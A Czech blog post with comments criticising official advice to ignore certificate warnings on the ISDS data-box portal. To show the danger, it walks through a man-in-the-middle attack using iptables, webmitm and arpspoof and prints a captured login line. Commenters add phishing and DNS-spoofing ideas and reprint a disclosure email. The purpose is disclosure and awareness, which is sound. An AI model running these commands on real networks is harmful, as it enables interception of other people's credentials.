abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    dnes 11:55 | Nová verze

    Desktopové prostředí LXQt (Lightweight Qt Desktop Environment, Wikipedie) vzniklé sloučením projektů Razor-qt a LXDE bylo vydáno ve verzi 2.1.0. Přehled novinek v poznámkách k vydání.

    Ladislav Hagara | Komentářů: 0
    dnes 10:33 | Zajímavý software

    Aplikace LocalSend, tj. multiplatformní open source alternativa k AirDropu, tj. bezpečné sdílení souborů a zpráv s okolními zařízeními přes lokální síť, bez potřeby připojení k internetu, byla vydána ve verzi 1.16, aktuálně 1.16.1. Instalovat lze také z Flathubu a Snapcraftu.

    Ladislav Hagara | Komentářů: 1
    včera 11:22 | IT novinky

    Nejnovější publikace v knižní edici správce české národní domény nese název ESP32 prakticky a jejím autorem je Martin Malý. Kniha je průvodcem ve světě výkonných a velmi bohatě vybavených mikrokontrolérů společnosti Espressif. V knize se naučíte, jak využít tento čip pro různé projekty, od základního nastavení a programování ESP32 v Arduino IDE, přes připojení k Wi-Fi a Bluetooth, až po pokročilé techniky, jako je realtime operační systém FreeRTOS, příjem signálu z družic nebo programování v ESP-IDF.

    Ladislav Hagara | Komentářů: 33
    včera 10:44 | IT novinky

    Byl představen nový oficiální 7palcový Raspberry Pi Touch Display 2. Rozlišení 720 × 1280 pixelů. Cena 60 dolarů.

    Ladislav Hagara | Komentářů: 0
    včera 08:11 | Komunita

    Na čem aktuálně pracují vývojáři webového prohlížeče Ladybird (GitHub)? Byl publikován přehled vývoje za říjen (YouTube).

    Ladislav Hagara | Komentářů: 0
    3.11. 22:55 | Nová verze

    Byla vydána verze 0.4.0 v Rustu napsaného frameworku Pingora pro vytváření rychlých, spolehlivých a programovatelných síťových systémů. Z novinek lze vypíchnout počáteční podporu Rustls, tj. implementaci TLS v Rustu. Společnost Cloudflare uvolnila framework Pingora letos v únoru pod licencí Apache 2.0.

    Ladislav Hagara | Komentářů: 0
    3.11. 22:33 | Komunita

    Byla vydána první pre-release verze desktopového prostředí Xfce (Wikipedie). Vydání ostré verze je plánováno na 15. prosince. Současně byla vyhlášena soutěž o výchozí wallpaper pro Xfce 4.20. Uzávěrka přihlášek je 15. listopadu.

    Ladislav Hagara | Komentářů: 0
    2.11. 11:00 | Pozvánky

    Přímý přenos z konference OpenAlt 2024, jež probíhá tento víkend v prostorách FIT VUT v Brně. Na programu je spousta zajímavých přednášek. Pokud jste v Brně, stavte se. Vstup zdarma.

    Ladislav Hagara | Komentářů: 1
    1.11. 23:55 | Humor

    V Coloradu unikla hesla k volebním počítačům. Více než 2 měsíce byla tabulka se stovkami hesel do BIOSu volně na webových stránkách. Dle úřadu je potřeba ještě druhé heslo, takže se o žádnou bezprostřední bezpečnostní hrozbu pro volby nejedná [Ars Technica].

    Ladislav Hagara | Komentářů: 0
    1.11. 18:33 | IT novinky Ladislav Hagara | Komentářů: 34
    Rozcestník

    Dat. schránky podruhé - nebezpečnostní upozornění

    3.7.2009 15:24 | Přečteno: 5066× | Datové schránky | poslední úprava: 9.7.2009 19:36

    Volbou přidání certifikátů k důvěryhodným certifikátům či pokračováním na stránku ISDS nevzniká žádné bezpečnostní riziko. Nebo vzniká?

    slibovaný návod na arpspoofing v druhé polovině blogpostu

    Na datoveschranky.info je hned na první stránce napsáno, že pokud nás při toulkách po portálu zastihne upozornění o neověřitelném certifikátu, máme jej vesele ignorovat a odkliknout. Zajímavé je, že málokoho napadne možné bezpečnostní riziko takového jednání. I sám Pan Ředitel ve včerejší zábavní estrádě prokázal, že má ohledně počítačové bezpečnosti mnohé mezery. A znáte to s tou kovářovic kobylou?

    Pojďme si tedy ukázat, co se může stát, když bude uživatel bezhlavě odklikávat OK. Dostat se někomu do datové schránky není zas tak složité...

    Cílem článku je především demonstrace, jak snadný může být man-in-the-middle útok. Nemusím doufám upozorňovat, že neručím za žádné problémy vzniklé aplikací zde popisovaných postupů. Nevhodné použití popisovaných programů může vést až k rozpadu vaší sítě, takže si dávejte bacha a zkoušejte si to radši jenom někde, kde to nikomu nevadí. Zneužití cizí DS je pochopitelně trestné.


    Neumím efektně stříhat video, takže si to asi Mrkva bude muset natočit sám.

    Úvaha na začátek

    Předpokládám, že tušíte, jak funguje HTTPS a podepisování certifikátů. Také byste měli alespoň zhruba tušit, jak probíhá komunikace v ethernetových sítích a tak...

    Nejdřív na svém počítači rozjedeme transparentní proxy, potom přes něj přesměrujeme komunikaci počítače oběti, podvrhneme vlastní certifikát a odposlechneme heslo. Jak prosté, milý Watsone.

    Co budeme potřebovat

    Náš počítač je v ethernetové síti realizované switchem, který neumí management portů (většina levnějších switchů), nebo ho nemá nastavený (většina dražších switchů). Takže třeba na koleji na Silicon Hillu to nepůjde. Předpokládám, že na svém počítači máme roota, že známe IP adresu počítače oběti a IP gatewaye. Ze softwaru budeme potřebovat iptables, webmitm a arpspoof z balíku dsniff.

    Relay

    V tomto kroku si vyrobíme vlastní certifikát (self-signed) a budeme poslouchat na portech 80 a 443 a logovat veškeré požadavky, které přes nás půjdou. Dále při pokusu o komunikaci s HTTP serverem s HTTPS stáhneme jeho certifikát, našemu klientovi podstrčíme svůj certifikát a požadavky od klienta vždycky naším soukromým klíčem rozšifrujeme, poznamenáme si je do logu, zašifrujeme "pravým" certifikátem a odešleme.

    #zapneme forwarding cizích paketů
    echo 1 > /proc/sys/net/ipv4/ip_forward
    #natlačíme do iptablů potřebná pravidla; v tabulce nat ani obecně by neměla být žádná s nimi konfliktní, kdyžtak si napřed celé iptably vyflushujte
    iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT
    iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT
    #spustíme webmitm; začne si generovat certifikát - vyplníme co nejvěrohodněji vypadající údaje
    webmitm
    #webmitm ukončíme, zapneme logování požadavků (debug mód) a necháme ho logovat do souboru
    webmitm -dd 2> soubor

    Když se teď připojíme na port 80 nebo 443 počítače, jeho chování by mělo velmi připomínat proxy a v souboru by měly být všechny vyslané požadavky.

    Arpspoof

    Teď potřebujeme, aby zvolená oběť posílala veškerou komunikaci přes nás. Toho dosáhneme jednoduše tím, že na ni začneme křičet, že brána jsme MY. Zároveň začneme křičet na bránu, že MY jsme oběť.

    arpspoof -t oběť brána
    arpspoof -t brána oběť

    Hotovo!

    Když se oběť pokusí spojit s czebox.cz (ano, netestuji to na živé datové schránce), objeví se pochopitelně okýnko (v případě Firefoxu stránka), že jako certifikát hu, které podle instrukcí České pošty odklikne. Až se přihlásí, nám se v logu objeví řádek podobný tomuto:

    option=credential&target=https%3A%2F%2Fwww.czebox.cz%2Fportal%2FISDS%2F&Ecom_User_ID=nejakejmeno&Ecom_Password=nejakeheslo&submit.x=89&submit.y=27&submit=Login

    (tip: doporučuji pustit na log grep s uživatelským jménem nebo alespoň nějakým jiným dostatečně unikátním řetězcem (submit=Login), log je fakt dlouhý)

    No a to je vše...

    Prevence

    Naimportovat si kořenový certifikát CA PostSignum a nějak si ověřit jeho SHA1sum.

    Pokud to bude někdo filmovat, dejte sem pak link ;-)

    Doporučený titulek pro Blesk a TV Nova: Student se naboural do systému datových schránek!

    UPDATE: Pokračování

           

    Hodnocení: 93 %

            špatnédobré        

    Obrázky

    Dat. schránky podruhé - nebezpečnostní upozornění, obrázek 1

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Vložit další komentář

    3.7.2009 15:44 Václav HFechs Švirga | skóre: 26 | blog: HF | Kopřivnice
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Ještě to rozeslat mediím :). Dobrá práce!
    Baník pyčo!
    Jendа avatar 3.7.2009 15:55 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Už vidím, jak odborníci z Nohy slabikují men-in-d-mi-dl... Chtělo by to nějakou BFU-style tiskovku :-)
    10.7.2023 11:45 jsimitseo
    Rozbalit Rozbalit vše เว็บรวมสล็อตทุกค่าย
    When choosing an online casino game site, it's important to research and verify the site's reputation and safety. Look for sites that are licensed and regulated by recognized regulatory bodies, offer secure payment options, and have a responsive customer support team. Additionally, always gamble responsibly and within your means. เว็บรวมสล็อตทุกค่าย
    17.7.2023 17:48 jsimitseo
    Rozbalit Rozbalit vše สล็อตฝากถอนไม่มีขั้นต่ำ
    To engage in online casino gambling, players typically need to register an account on a licensed and reputable online casino website. During the registration process, players may be required to provide personal information and undergo age verification to ensure they meet the legal gambling age. สล็อตฝากถอนไม่มีขั้นต่ำ
    15.8.2023 20:14 jsimitseo
    Rozbalit Rozbalit vše สล็อตเว็บใหญ่ที่สุด
    One of the key factors that contribute to the success of these web slots is their direct web access. Unlike traditional brick-and-mortar casinos, players can access these virtual slot machines directly from their computers or mobile devices. This accessibility allows for unprecedented convenience, making it possible for players to enjoy their favorite games from the comfort of their own homes or on the go. สล็อตเว็บใหญ่ที่สุด
    16.8.2023 20:17 jsimitseo
    Rozbalit Rozbalit vše สล็อต โรม่า
    This is exceptionally fascinating, yet it is important to tap on this connection: สล็อต โรม่า
    3.7.2009 15:48 CEST
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Jeste tam prihod popis, jak obeti zasleme email, neco jako "Dobry den, do datove schranky jsme vam poslali dulezite oznameni o necem, mel byste si ho precist, je to dulezite". Odkaz bude smerovat na nejakej ala phishing web trebas i s nejakou peknou UTF-8 URL a tam bude zase tvuj proxy.
    Jendа avatar 3.7.2009 15:53 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Ale tak jako že je oběť blbá a skočí na phishing, za to pošta nemůže. A v .info ani .cz IDN ještě (bohudík) nefunguje.
    4.7.2009 09:10 Martin
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění

    Máš pravdu, v .info IDN nefunguje: http://www.datovéschránky.info/

    4.7.2009 22:50 CEST
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění

    Za phising a blbost uzivatele samozrejme posta nemuze. Ale phishing je nejjednodussi a pokud navic oficialni mista radi ignorovat varovani o neoverenem certifikatu, je to opravdu jednoduche presmerovat uzivatele na nejakou jinou stranku. Je to o hodne jednodussi na rozdil od zminovaneho prikladu s vnucenim obeti nasi GW, a navic univerzalnejsi, kdyz obet nemusi byt v nasi siti. Stejne tak DNS poisoning je o dost  slozitejsi, nez jednoduchej phishing.

    Proste chtelo by to udelat co nejjednodussi ukazku, jinak budou prave ti "profesionalove" jako ve zminenem rozhovoru pouze argumentovat, ze to je slozite, ze to musi byt na stejne siti atd. Presmerovat nekoho z emailu je opravdu jednoduche a funguje to vsude.

    Jendа avatar 4.7.2009 23:09 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Proste chtelo by to udelat co nejjednodussi ukazku, jinak budou prave ti "profesionalove" jako ve zminenem rozhovoru pouze argumentovat, ze to je slozite, ze to musi byt na stejne siti atd.
    Jak ukázku? Jako poslat mail (s From: info@datoveschranky.info) a v něm mít odkaz na falešnou stránku? A jak se proti tomu má pošta bránit?
    6.7.2009 08:28 Honza Jaroš | skóre: 6 | blog: moje_strana_plotu | Bohnice
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Neradit lidem, aby ignorovali varování před neznámým certifikátem ;-)
    6.7.2009 08:59 Filip Jirsák | skóre: 68 | blog: Fa & Bi
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Tak ony jsou celé Datové schránky takový atentát na elektronický podpis a infrastrukturu veřejných klíčů (např. elektronický podpis nahrazují jménem a heslem), doporučení odkliknout každý certifikát, který se prohlížeči nabídne, je jenom pokračování v tomto snažení.
    6.7.2009 09:48 petr_p | skóre: 59 | blog: pb
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Přidat lze aféru s evropskými čipovými pasy. Zajímalo by mě, jestli jsou tak blbí nebo navedení.
    6.7.2009 10:15 Honza Jaroš | skóre: 6 | blog: moje_strana_plotu | Bohnice
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Těch věcí je víc, třeba Karta Pražana (nyní Opencard) s nezměněnými továrními klíči. Tehdy bylo jediným výsledkem odklizení tehdejšího šéfa odboru informatiky (kterému se v té době podařilo jeho odbor téměř celý zlikvidovat a převést jeho funkce na externí firmy) o post níže, nicméně nadále dělal v podstatě totéž co předtím. Nyní ho už strana převelela jinam, takže momentálně škodí na vedoucí funkci v České televizi...
    6.7.2009 11:10 Filip Jirsák | skóre: 68 | blog: Fa & Bi
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Tam jde o co?
    6.7.2009 12:16 petr_p | skóre: 59 | blog: pb
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Tam jde o bezkontaktní RFID, které lze z principu odposlouchávat, kde z „technických“ důvodů nejsou digitální podpisy na hranicích kontrolovány (což umožňuje klonování pasů) a kde jsou používány slabé algoritmy na ochranu citlivých údajů (které tak lze snadno získat, přestože by k nim měl mít přístup jen hraniční úředník). V roce 2006 byly tyto problémy předvedeny v jedné dánské televizi a na konferenci Black Hat v Las Vegas. Mám dojem, že se někomu i podařilo získat data nějakého unijního pohlavára. Výsledek je, že celý projekt byl de facto pozastaven. De jure sice státy mají povinnost se držet harmonogramu (prozatím jsou povinné otisky a obličeje zakódované do čárových kódu), ale další postup (používání čipů) prakticky nikdo (kromě Británie) hromadně ještě nenasadil a záležitost se oddaluje. Jako určitý seznam literatury lze použít odkazy z kapitoly Attacks na anglické Wikipedii o Biometric passport.
    3.7.2009 16:42 Kvakor
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Nebo se může využít nějaká díra v mailovém klientovy či browseru, skrz kterou jde provést libovolný kód útočníka (a že jich ve Windows bylo - většina záplat řešila právě takové chyby), potom stačí například upravit soubor hosts, takže oběť nepozná, že se připojuje úplně někam jinam.

    Ještě, že tohle pokročilejší antiviry kontrolují ...
    Luk avatar 3.7.2009 16:47 Luk | skóre: 47 | blog: Kacířské myšlenky | Kutná Hora
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Nebo existuje DNS spoofing/pharming (podvržení DNS odpovědí). DNSSec se prakticky ještě vůbec nepoužívá.
    Šifrování je absolutní nutnost a pomáhá chránit před nekalými živly
    Jendа avatar 3.7.2009 17:57 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Nebo se může využít nějaká díra v mailovém klientovy či browseru, skrz kterou jde provést libovolný kód útočníka (a že jich ve Windows bylo - většina záplat řešila právě takové chyby), potom stačí například upravit soubor hosts, takže oběť nepozná, že se připojuje úplně někam jinam.
    Nebo rovnou nainstalovat keylogger, že. Zase - za děravý browser klienta nemůže pošta.
    Salamek avatar 3.7.2009 15:48 Salamek | skóre: 22 | blog: salamovo
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    už to někdo spáchal natočil ? :-D , já bych to udělal ale nechci aby mě pak nějakej debil zabásnul místo toho aby to spravili :-D
    Skutečně nemám v plánu zničit Microsoft. Bude to jen zcela neúmyslný vedlejší efekt.
    Jendа avatar 3.7.2009 15:51 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Už jsem to řešil :-)
    Salamek avatar 3.7.2009 15:55 Salamek | skóre: 22 | blog: salamovo
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    aha, tak to jo :-), já jdu ku*vit :-D
    Skutečně nemám v plánu zničit Microsoft. Bude to jen zcela neúmyslný vedlejší efekt.
    Luk avatar 3.7.2009 16:16 Luk | skóre: 47 | blog: Kacířské myšlenky | Kutná Hora
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Naimportovat si kořenový certifikát CA PostSignum a nějak si ověřit jeho SHA1sum.
    Vyžádal jsem si již včera vyjádření PostSignum QCA, jak certifikát bezpečně ověřit. Pokud nedostanu uspokojivou odpověď, podám podnět k ministerstvu vnitra* pro porušení § 6, odst. 1, písm. a) zákona 227/2000 Sb. () Za to lze podle § 18a, odst. 6, uložit pokutu do 10 milionů Kč. Podle certifikační politiky kořenového certifikátu by mělo jít nechat si na "registračních autoritách" (pracovištích ČP) nakopírovat kořenový certifikát na médium. Toto také každému doporučuji, protože je to jediný bezpečný způsob.

    *Problém je v tom, že Česká pošta s.p. patří pod ministerstvo vnitra. Proto bude MV kontrolovat případné porušení zákona ve své vlastní organizaci, čili nemusí mít zájem na tom, aby se porušení zákona prokázalo.
    Šifrování je absolutní nutnost a pomáhá chránit před nekalými živly
    3.7.2009 16:32 Kvakor
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Nedostane každý při zřízení oné schránky nějaké papíry? Pak by se SHA1sum mohla otisknout právně v nich, spolu s popisem, jak ověřit, že certifikát není podvržený - ten, kdo podvrne vlastní certifikát, může stejným způsobem podvrhnout i kořenový certifikát CA.
    Luk avatar 3.7.2009 16:42 Luk | skóre: 47 | blog: Kacířské myšlenky | Kutná Hora
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Nedostane každý při zřízení oné schránky nějaké papíry? Pak by se SHA1sum mohla otisknout právně v nich, spolu s popisem, jak ověřit, že certifikát není podvržený
    Byla by to samozřejmě dobrá cesta, ale nedělám si moc velké iluze, že se tam fingerprint dnes uvádí (téměř jistě ne), ani že to tam jen tak sami od sebe začnou uvádět. Kdyžtak je bude potřeba k tomu dokopat (nebo k jiné srovnatelně bezpečné a pohodlné cestě). Nicméně primární by mělo být poskytnutí přes pracoviště ČP, jak je to uvedeno v jejich politice. Jsem zvědav, co mi odpoví (protože by měli odpovědět to, co je v politice uvedeno, případně na ni odkázat). Pak zkusím přijít na poštu (kam stejně musím, protože mi před časem propadl elektronický podpis - zapomněl jsem ho včas prodloužit) a nechat si nakopírovat kořenový certifikát. Doufám, že se nebudou tvářit, že nevědí, co po nich chci. A právě, jak už jsem říkal, ať to zatím takhle dělá každý, protože certifikát získaný přes HTTP může být podvržený.
    Šifrování je absolutní nutnost a pomáhá chránit před nekalými živly
    4.7.2009 22:54 CEST
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění

    Hmmm, kdyz jsem sepisoval smlouvu na inet bakovnictvi do KB, tak jsem mel ve smlouve i nejakej checksum - nevim ted, jestli tehdy jeste MD5 nebo uz i SHA1, ale kontroloval jsem to, ale navic KB to ma podepsany verisignem. Mozna to stejnym zpusobem maji i datovyschranky.

    9.7.2009 14:10 rastik
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění

    Každý dostane u PostSignum společně s certifikátem i kořenové certifikáty na flashku. Tak předpokládám, že je možné je získat i na vyžádání, bez žádosti o vytvoření certifikátu.

    3.7.2009 16:43 Roman Schulz | skóre: 8 | Brno
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Já myslím, že to je vážná chyba. Postsignum se mělo dávno snažit, aby jejich certifikát byl v nejčastějších prohlížečích (IE, Opera, Firefox..) automaticky
    3.7.2009 17:06 12345 | skóre: 41 | blog:
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Řekl bych, že tou opravdu vážnou chybou je, že někdo oficiálně doporučuje bezmyšlenkovité odklikávání neznámých certifikátů. Být zaměstnavatelem, tak bych se s autorem takového doporučení nejraději rozloučil.
    otasomil avatar 3.7.2009 19:21 otasomil | skóre: 39 | blog: puppylinux
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění

    A je tu duvod ji rozebirat.

    Mj jestli potkavate p Koupeho (osobnosti.cz)  tak ho  ode mne pozdravujte.

    Dekuji

    K čemu hudba, která nevede k extázi... Stop MDMA !!! I spam umí být roztomilý
    xkucf03 avatar 4.7.2009 10:10 xkucf03 | skóre: 49 | blog: xkucf03
    Rozbalit Rozbalit vše Certifikáty v prohlížečích

    Dostat do prohlížečů další certifikační autoritu je prakticky nemožné, zvlášť pokud se týká jen jednoho státu. Podobně hezké by bylo, kdyby se tam dostala např. CA CESNETu, ale to je také nereálné.

    Řešením tedy je, mít bezpečný server s HTTPS certifikátem podepsaným nějakou důvěryhodnou* autoritou a umožnit lidem si z něj stahovat certifikáty českých CA.

    *) uznávanou v prohlížečích. A zároveň šířit otisk toho certifikátu i jinou cestou.

    Mám rád, když se lidé přou, znamená to, že vědí, co dělají, a že mají směr. Frantovo.cz, SQL-DK, Relational pipes
    4.7.2009 13:52 Filip Jirsák | skóre: 68 | blog: Fa & Bi
    Rozbalit Rozbalit vše Re: Certifikáty v prohlížečích
    I.CA svůj kořenový certifikát nedávno do Windows dostala (ovšem musel být vydán opět nový, ten původní by asi z nějakého důvodu neprošel).
    Michal Wirth avatar 3.7.2009 16:47 Michal Wirth | skóre: 26
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Pokud se s tim nechcete moc pytlikovat, tak sahnete po ettercap. Umi to same na cca 3-5 kliknuti. Zkousel jsem to a moc pekne to funguje. :-) Navic umi i spoustu dalsich uzitecnych veci.
    Důležité se časem stává absurdním, absurdní se časem mění v důležité.
    3.7.2009 17:46 Milan Jurik | skóre: 21 | blog: Komentare | Ova
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    "Poznámka: Za (dostatečně) důvěryhodný můžete považovat certifikát autority, který vám osobně předá operátorka na pracovišti České pošty. Certifikáty autorit jsou vám automaticky předávány spolu s vydaným certifikátem."

    Citace ze stranek PostSignum QCA
    Luk avatar 3.7.2009 18:00 Luk | skóre: 47 | blog: Kacířské myšlenky | Kutná Hora
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    To ano (jak jsem si teď ověřil, opravdu jsem tehdy kořenový certifikát obdržel), ale zřízení datové schránky nemusí znamenat pořízení elektronického podpisu a tedy ani návštěvu ČP. Proto kdo tam nepůjde kvůli podpisu, bude tam muset zajít explicitně pro kořenový certifikát.
    Šifrování je absolutní nutnost a pomáhá chránit před nekalými živly
    otasomil avatar 3.7.2009 17:55 otasomil | skóre: 39 | blog: puppylinux
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění

    K tomu bych si dovolil dodat modifikovanou hlasku z jednoho ceskeho filmu:

    Hlavne o tom zvante d******e, at mame na krku IT kriminalku.

    K čemu hudba, která nevede k extázi... Stop MDMA !!! I spam umí být roztomilý
    Jendа avatar 3.7.2009 17:58 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Ten film neznám, ale... jak jinak než zveřejněním bys je chtěl donutit k opravě?
    otasomil avatar 3.7.2009 18:41 otasomil | skóre: 39 | blog: puppylinux
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění

    Vsak jo. Vase ciny jsou chvalihodne.

    Je treba hledat bezpecnostni problemy.

    K čemu hudba, která nevede k extázi... Stop MDMA !!! I spam umí být roztomilý
    Luk avatar 3.7.2009 18:05 Luk | skóre: 47 | blog: Kacířské myšlenky | Kutná Hora
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    O tom je potřeba žvanit. Jinak se to všechno hezky zamete pod koberec a všichni se budou tvářit, že je všechno v pořádku. A kriminálku bychom měli upozornit naopak my, protože inkriminované doporučení na serveru www.datoveschranky.info je podle mého názoru na hranici (nebo už za ní) trestného činu, jak už jsem nedávno uvedl.
    Šifrování je absolutní nutnost a pomáhá chránit před nekalými živly
    Jendа avatar 3.7.2009 18:34 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Hele, a napadlo vás vůbec někoho, že to pan ředitel nikomu neprozradil, a tudíž by se hodilo dát jim o tom vědět? Třeba o tom fakt ještě nevědí. Poslal jsem na dotazy zavináč datoveschranky info tento mail:
    Předmět: Zavádějící tvrzení na datoveschranky.info
    
    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    Dobrý den,
    na adrese http://datoveschranky.info/ je uvedeno velmi zavádějící
    tvrzení, jehož dodržení může ohrozit bezpečnost uživatele:
    
    "Při pokusu o přihlášení do systému ISDS se může objevit varování,
    upozorňující na problém s bezpečnostním certifikátem stránky. Toto je
    způsobeno nepřítomností certifikátu ve standardní instalaci MS Windows
    či jiných operačních systémů. Upozornění je nutno ignorovat; vstup na
    stránku je zcela bezpečný neboť používaný certifikát je vydán
    kvalifikovanou českou certifikační autoritou. Volbou přidání
    certifikátů k důvěryhodným certifikátům či pokračováním na stránku
    ISDS nevzniká žádné bezpečnostní riziko."
    
    Pokud se uživatel bude těmito instrukcemi řídit, nainstaluje si
    certifikát, u kterého nemůže ověřit, jestli ho opravdu vydalo
    PostSignum nebo ho podvrhl útočník. Vhodnější by bylo, pokud byste
    uvedli, jak si naimportovat kořenový certifikát PostSigna a ověřit
    jeho integritu.
    Děkuji za vyjádření,
    Jan Hrach
    
    - --
    Jan Hrach
    Mail: jenda {} hrach.eu
    Jabber: hrachj {} abclinuxu.cz
    GPG: http://ftp.hrach.eu/jenda/public.key
    1D9D AC4B E964 0D1E 7F5D 6E03 B72F 6430 9FA4 F536
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.4.9 (GNU/Linux)
    Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
    
    iEYEARECAAYFAkpOMj8ACgkQty9kMJ+k9TawnQCg7apv2DFC8SW+UpS6+OXPJ/mG
    w6kAniPI+lyxSOYDQSCRsrbHyft9BIjW
    =J1UN
    -----END PGP SIGNATURE-----
    otasomil avatar 3.7.2009 18:45 otasomil | skóre: 39 | blog: puppylinux
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění

    Tak to se tu za vsechny tesim na odpoved. Ani bych se nedivil kdyby neodpovedeli - k tomu mailu totiz neni co dodat.

     

    K čemu hudba, která nevede k extázi... Stop MDMA !!! I spam umí být roztomilý
    Grunt avatar 3.7.2009 23:31 Grunt | skóre: 23 | blog: Expresivní zabručení | Lanžhot
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Ještě kdysi v dávných dobách jsem zveřejnil pár FW pravidel(nic čistého, to je mi jasné) pro jistý OS, který s oblibou používají ISP. Jak jsem později zjistil, tak ho používali i k různým dalším činnostem. Podstata je ta, že aniž by to klient věděl, tak komunikuje s jiným serverem než se kterým původně chtěl(Únos spojení?) jen s tím detailem, že nemá šanci to nijak rozumně zjistit, jelikož tím únoscem(man-in-the-middle) je router(IP, MAC adresy,…díky NATu všechno sedí. No prostě hnus nejzelenější). Což takhle k tomu ještě doplnit serverou část, která by logovala ty uživatelské údaje pěkně do databáze aby se mohl stát MiM(kterým už vlastně z principu je, jen si to díky vlastní neschopnosti neumí zařídit) mohl stát kterýkoliv ISP pouhým stáhnutím skriptu a použitím CTRL+C a CTRL+V. Třeba by mělo šanci to trochu zvednout nedůvěřivost v našich končinách. A ještě by tím ISPčka částečně splnili tu úžasnou vyhlášku o logování provozních údajů.
    Na co 64-bitů když to jde i s jedním? | 80.78.148.5 | Hack (for) free or Die Hard!
    Grunt avatar 3.7.2009 23:33 Grunt | skóre: 23 | blog: Expresivní zabručení | Lanžhot
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    BTW: Uznávám, že mi už asi šibe riadně.
    Na co 64-bitů když to jde i s jedním? | 80.78.148.5 | Hack (for) free or Die Hard!
    belisarivs avatar 4.7.2009 08:57 belisarivs | skóre: 22 | blog: Psychobláboly
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění

    Mozna je to blba otazka, ale nestoji pokus o napadeni timto zpusobem na nutnosti byt s napadenym ve stejne siti a to jeste na hubu, ktery posila data vsem a ty pak jdou zachytit treba wiresharkem, ktery prepne sitovku do promiskuitniho rezimu?

    Cili, pokud jsem priojen do switche, ktery neposila vse vsem, ale jenom tomu, komu ma, tak jsem za vodou?

    IRC is just multiplayer notepad.
    4.7.2009 09:37 TM
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Na stejném segmentu ethernetu, případně na stejném vlanu být musíte, ale switch vám rozhodně nepomůže - viz. arpspoof, který autor využívá.
    Ale ono by to šlo udělat i jinak - představte si třeba, že zlý hoch má v rukou softwarový router, přes který jde provoz od toho uživatele...může použít i jiné nástroje - stunnel apod.
    Každopádně autor udeřil přesně hřebíček na hlavičku - radit lidem, aby bezhlavě odklikávali certifikát, který browser považuje za nedůvěryhodný vskutku není ideální...
    thingie avatar 4.7.2009 12:23 thingie | skóre: 8
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Jak autor popisuje, switch není překážkou, není-li dostatečně chytrý a zároveň ještě vhodně nastavený, což nebývá (obojí najednou) zvykem. Kde by člověk dneska hledal hub…
